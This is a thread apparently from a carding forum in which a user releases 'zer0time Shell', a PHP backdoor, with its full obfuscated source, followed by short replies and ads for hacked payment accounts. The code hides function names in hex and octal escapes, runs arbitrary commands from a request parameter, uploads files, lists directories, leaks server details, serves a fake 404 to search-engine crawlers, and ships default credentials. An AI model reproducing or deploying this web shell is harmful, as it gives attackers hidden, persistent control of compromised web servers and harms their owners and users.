We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
zer0time Shell [PHP]

#1
zer0time Shell [PHP]

This version is simply coded in functions and Case code, bear in mind this is my first php shell release!
Shell includes command execute, uploader, directory listing, server information, anti crawler and email bomber script (coming soon).
This is my first coded PHP Shell backdoor, hope you guys like! It also include MD5 login encryption. Contacted me at: zer0time@tormail.org for feedback and suggestions.

As listed before:

CMD (Command Execute)
Uploader
Directory Listing
Server Information (PHPInfo)
Anti Crawler

Coming soon:

Email Bomber
Log out script


Username is: r00t
Password is: r00t

Change if you want just encrypt it first in MD5 Smile

Code:
<?php
/*******************************************\
|        Coded by zer0time                       |
| Greetz to all the boys and girls from |
| https://www.zentrixplus.net/forum and |
|        https://overhaul.c0rrupt.net/            |
\*******************************************/
$x1f="\x63\154o\163\x65d\151r"; $x20="co\x70\x79"; $x21="ex\x65\x63"; $x22="\146\x69\154\x65\x5f\x67e\164\x5f\143o\156\164e\x6e\x74\163"; $x23="\147\x65\x74\x5f\x63u\x72r\x65n\164\x5f\x75\x73\145\x72"; $x24="\x67\x65t\x6d\x79\x75\151\144"; $x25="\147\x65te\156\166"; $x26="h\145a\x64\x65r"; $x27="\x69mp\x6c\x6f\x64e"; $x28="\x6d\1445"; $x29="\x6f\160\x65n\x64\151\x72"; $x2a="\160\x68\160\137u\x6e\x61\155\x65"; $x2b="\160\150p\x69\156\x66\x6f"; $x2c="\x70\162\145\147_\155\x61\164\143h"; $x2d="\x72\x65a\144\x64\151\162";
$x0b="\172\x65r0\x74\x69\x6d\145\040\x53he\154l";$x0c=1;define('REMOTE_VERSION', 'https://zer0timedumps.3owl.com/version.txt');define('VERSION', '1.0'); if($x0c == 0) {$x26("\114oca\164io\156\072 \150\164t\x70\x3a\x2f\x2fw\x77w.\147\157ogl\x65.\x63\157\x6d\x2ea\165/");exit();}function x0b () { global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; $x0d = 1;$x0e='27db7898211c8ccbeb4d5a97d198839a'; $x0f='27db7898211c8ccbeb4d5a97d198839a'; if(!empty($_SERVER['HTTP_USER_AGENT'])){$x10 = array("G\x6fog\154\145", "\123\x6c\165\162\x70", "MSN\x42\157t", "ia_\x61\x72\x63\x68\151\166\145\x72", "\131\x61\x6e\x64\x65\x78", "\122\141\x6db\x6c\145\162", "Y\x61ho\157");if($x2c('/' . $x27('|', $x10) . '/i', $_SERVER['HTTP_USER_AGENT'])){$x26('HTTP/1.0 404 Not Found');exit;}} if($x0d == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) || $x28($_SERVER['PHP_AUTH_USER'])!==$x0e || $x28($_SERVER['PHP_AUTH_PW'])!==$x0f){$x26('WWW-Authenticate: Basic realm="r00t ?"');$x26('HTTP/1.0 401 Unauthorized');exit("\101\143\143e\163\163\x20D\145\156i\145\144\041");}}} $x11["\150o\x6d\x65"] = "\077x\075\x68o\x6d\145";$x11["\143\x6d\144"] = "?\170\075\x63md";$x11["u\160\x6co\141\144\145r"] = "\x3fx=\x75\x70\x6c\157\141\x64";$x11["\144i\x72"] = "\077\170\x3d\x64\x69\162";$x11["i\x6ef\x6f"] = "\077\x78\x3din\146\157";$x11["p\150p\x69nf\x6f"] = "\077\x78=p\150\x70\x69nf\x6f";$x11["e\x6d\x61\x69l"] = "\x3fx\075ema\151\x6c";foreach($x11 as $x12 => $x13){$x14 .= "\133<\141\x20\x68\162e\x66\075'$x13'>$x12<\x2f\141>\135\n";}$x15="\074\x74\x61\142\x6c\x65 w\151\144\164\150\075'\061\060\x30\045'\040\x62\157\x72\144\x65\x72\075'\x30'\040c\145\154\x6c\x73\x70a\x63in\147\075'0'\040cel\154\160a\144\x64i\156\147\x3d'\064' bg\x63\157\x6c\x6f\162\075'\x23\x33\06333\x33\x33'>\x3c\164\x72><td\x3e$x14\074b\x72\x3e\n</\164d>\074/\x74\162\x3e\x3c\x2ft\x61\142\x6c\x65>"; $x16="\074\x74\141b\x6c\x65 \x77\x69\144th='\x310\x30\045'\x20\142\x6fr\144e\162\075'\060'\040\143\x65\154\x6c\163\x70\x61\x63i\156g\x3d'\x30'\x20\143e\x6c\x6c\160\141\x64\144\151\x6e\x67\075'\064' \x62g\x63\x6fl\157\x72\075'\x23\x333\x33\063\0633'\076\x3ct\x72\x3e
\x0a\x20 <\164\144\x3eP\x6fwer\x65d\x20b\x79 $x0b</\164\x64\076
\x0a\x3c\057\x74r\x3e\074\057t\x61b\x6c\x65\x3e";function x0c(){ global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; echo "\x3c\150\x33>We\154\143om\145 to\040\x7a\x65\162\x30t\x69m\145\040\123\x68\x65ll\056 \x3c\151\076\x52\x65\x6d\x65\x6db\145r t\x6f \143\150\141n\147\x65\x20\165se\162n\x61\x6d\145 a\156d p\x61s\x73\167o\162\144\040\144\x65fu\x6c\x74\x20\151\163\x20\16200t\040!\074\x2f\x69></\150\063>
T\150\x69\163\x20\166\x65\x72\163i\157\x6e \151\163\x20\163i\155\160\154\171\x20c\x6fd\145d \x69\156\040f\x75\x6e\x63\164\x69\x6f\x6e\163\040an\x64 C\141\x73\x65\x20\143\x6f\x64\145,\x20\142\145\x61\162 \x69\156 m\x69n\144\040\x74hi\x73\040\x69\x73\040my\040\x66\151\x72\x73\x74\040\x70\150\160\040\x73\x68\145\154\x6c\x20r\x65l\x65\141\163\145!\x3c\142\x72>\015\012\123\x68\145l\154 \x69\156\143l\165\x64\145\x73\040\143ommand e\x78e\x63ute\x2c\x20\x75\x70lo\x61\x64\x65\x72\054 d\x69\x72\x65\x63\x74\157\x72\171\x20\154\151\x73\164\151\156\x67\x2c
s\145r\x76\x65\x72\040\151nf\x6frma\x74\x69on,\x20\141n\x74i\x20\x63\x72\141\x77l\x65\162 a\156\x64\040\145mai\154\040\142\x6f\155\142\x65\x72\040\x73\x63rip\164\x20(c\x6f\x6d\151\x6eg\040\163oo\x6e\051\056\074\x62\162\076
This \151\x73 \155\171 fi\x72\x73\x74\040c\x6f\x64ed \120\x48\x50 \x53\150\145\154\x6c\x20\142\141\143\153d\157\157\162\054\040\x68\x6f\160\x65\040\x79ou\x20g\x75y\x73 \154\x69ke!\x0d\012It\040\x61ls\x6f inc\154\165\x64\145\040\x4d\x445\040\154\x6f\147\151\x6e\x20\x65\x6ec\x72\x79\x70\x74io\156\x2e C\x6f\x6et\141\x63t\145d m\145\x20\141\164\072 zer\060\164\151\155e\x40\164or\155ail.\x6f\162g f\157\x72 \x66eed\142a\143k\x20a\x6e\x64\040s\165g\147es\164\x69\157\156\x73.";}function x0d(){ global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="upload"></form>';if( $_POST['_upl'] == "u\160\x6co\141\x64" ) {if(@$x20($x17['file']['tmp_name'], $x17['file']['name'])) { echo '<p class="green">Upload successfull !</p>'; }else { echo '<p class="red">Upload failed !</p>'; }}}function x0e(){ global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; echo '
<body onload="command.focus()">
<form action="" method="post">
<input name="cmd" type="text" id="command" />
<input name="Submit" type="submit" id="Submit" value="Submit Command" />
</form></body>';if (isset ($_POST['cmd'])){ $x21($_REQUEST['cmd'], $x18);foreach ($x18 as $x19){ print "$x19\x3c\x62\x72\x3e\n";}}}function x0f(){ global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; echo '.system: '.$x2a().'</br>
.uid: '.$x24().'</br>
.user: '.$x23().'</br>
.your_ip: '.$x25("\122\105\x4dOTE\x5f\x41\104DR").'<br>
.your_useragent: '.$x25("H\x54\124\120_\125\123\105\122\x5f\x41G\105\116\x54").'<br>
.server_host: '.$x25("\110\x54\124\x50\137H\x4f\123\124").'<br>
.server_port: '.$x25("\123E\122V\x45\122_\120\x4f\122\x54").'<br>
.server_patch: '.$x25("D\117C\x55\x4dE\116\124\137\122\117OT").'<br>
.server_protocol: '.$x25("\123\x45\122VE\x52_PR\x4fTOC\117\x4c").'<br>
.server_language: '.$x25("\x48T\x54\120\137\101C\x43\x45P\x54\x5f\114\101NG\125\101\107\x45").'<br>
.server_software: '.$x25("\123ERV\x45R\x5f\123\117FTW\x41\122\x45").'<br>
.server_admin: '.$x25("S\105\122\126\105R\x5f\x41D\x4d\111\x4e").'<br>
.author: zer0time@tormail.org'; }function x10(){ global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; $x2b();}function x11 () { global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; if ($x1a = $x29('./')) {echo "<\1503\076Fi\154\x65s\x3a\x3c\x2f\x68\063\x3e\n";while (false !== ($x1b = $x2d($x1a))) {echo "\x3c\x69\076<\x75\154>\074\x61\040\150r\x65f='.\057$x1b'>$x1b</\x61>\074\x2ful>\074\057\x69\x3e";}$x1f($x1a);}}$x1c="\x0d
\x3c\164\x69\164le\076$x0b\074\057\164\x69\x74\x6c\x65\x3e
\x0a\x3c\x73\164\171\x6ce\x20\x74\171p\x65='t\x65xt/\143ss'\076\015
<\x21\055-
b\157\144y\040{
bac\153\147r\157u\x6ed\055\143\157\154\157\162\072\040\x23\x30\060\x30\x30\x30\060\073\x0d\x0a}\015\x0ab\x6fd\x79\054\164d\054\164\150\040{\015\012\011\x63\157l\x6f\x72:\x20\043\106\106\071\071\x300\073
\012 \x66on\164\x2d\146a\155\x69\154\171\x3a\x20V\145\162\x64\x61\x6e\x61, Arial,\x20He\154\x76\x65\164i\143a\054 \x73\x61ns-\163e\162\151f\x3b
\012\011b\157t\164\x6fm: \x69nhe\162\151\164\073
\x0a \x62\x6frde\162\x3a\040\x6d\145\144\151\165m do\164\x74\145\x64\040\043\x36\x36\066666;
\x7d\015\012\141\040\x7b
\012\x09\x66ont\055f\x61\155\151\x6cy\072\040\103\157\x75r\151\145\x72\040\x4e\145w\x2c\040C\157ur\151e\162\x2c\x20\155\157n\157space;\015\012\x09c\x6f\x6c\x6f\162\072 \043\x39\x39\x39\x39\071\071\x3b\x0d\x0a\175\015\012\141\072\x76\x69\x73ite\x64\x20{\x0d\012\011c\x6f\154\x6f\x72\072 #\x399\x39\x3999\x3b\x0d
}\x0d\012a\072\150\157\166e\x72 \173\015\x0a\011\x63o\x6c\x6f\162:\x20\043\071\071999\071;\x0d\012\175\015\x0aa:a\143\164\151\x76e\x20\173\x0d
\011\143\157lo\162\x3a\040#\x3999\x39\x39\071;\x0d\012\x7d\x0d
\x69\156\160\165\164 \x7b\015\012\x09\102\101\103K\x47\x52OU\116\x44-C\117\x4c\117R:\040\043\0633\063\x333\x33;\x0d\x0a\011f\157\x6e\164\x3a\040\071pt \x74\x61\x68o\x6d\141;\015
c\157\x6c\x6fr\072\040\x23\x46F99\060\x30;
\012 \142\157\x72\144\x65r\072\040\061 g\x72\x6fo\166\x65\040\x23\x39\071\060\x300\060\x3b
\012\175\x0d\012.\x72\x65d\x20\173\015\x0a\x63\x6f\x6co\x72\x3a \x23\106\106\060\x30\060\060
\012\x7d\015\x0a.\147re\145n\x20{\x0d\x0a\143\x6fl\157\x72:\x20\04300\x46\x46\0600\015\012}\015\012\x3b\015\x0a\x2d\x2d\076\015
\074\x2f\x73\x74y\154e\076";function x12() { global $x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d; $x1d = $x22(REMOTE_VERSION);$x1e = VERSION;if($x1e == $x1d) {echo "<\x70\040\x63\154a\x73\x73\x3d'\147reen'>\x48\x65l\x6co\040\x57\157\x72\154d\054 \x54\150is\x20\x70\x61rt\x20\157\146 \164\x68\145\x20\x53\x68e\x6c\x6c i\x73 co\155\151\156g\x20s\x6f\x6f\x6e,\040\x61nd \x6d\x6f\162\x65\041 \x3a\104\041";}};echo $x1c;echo $x15;x0b(); if (isset($_GET['x'])){ switch($_GET['x']){ case 'home':x0c();break;case 'upload':x0d();break;case 'cmd':x0e();break;case 'info':x0f();break;case 'phpinfo':x10();break;case 'info':x0f();break;case 'dir':x11();break;case 'email':x12();break;} }else{$x26("\x4c\157\143\x61\164\x69\157\156\x3a\x20\x3f\x78=\150om\145");};echo $x16;?>
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]


#2
Thanks came in handy Smile
Reply

#3
how to hack and upload shell????? am new here elite me
Reply

#4
Nice Info Smile
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]


#5
PHP Code:
[home] [cmd] [uploader] [dir] [info] [phpinfo] [email]
Access Denied

Can anyone help me?
Reply

#6
Thank's mate... Nice Info
[Image: mv5bue.gif][Image: 1ibuxg.jpg]
Reply

#7
Thanks, already have it.
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]




Forum Jump: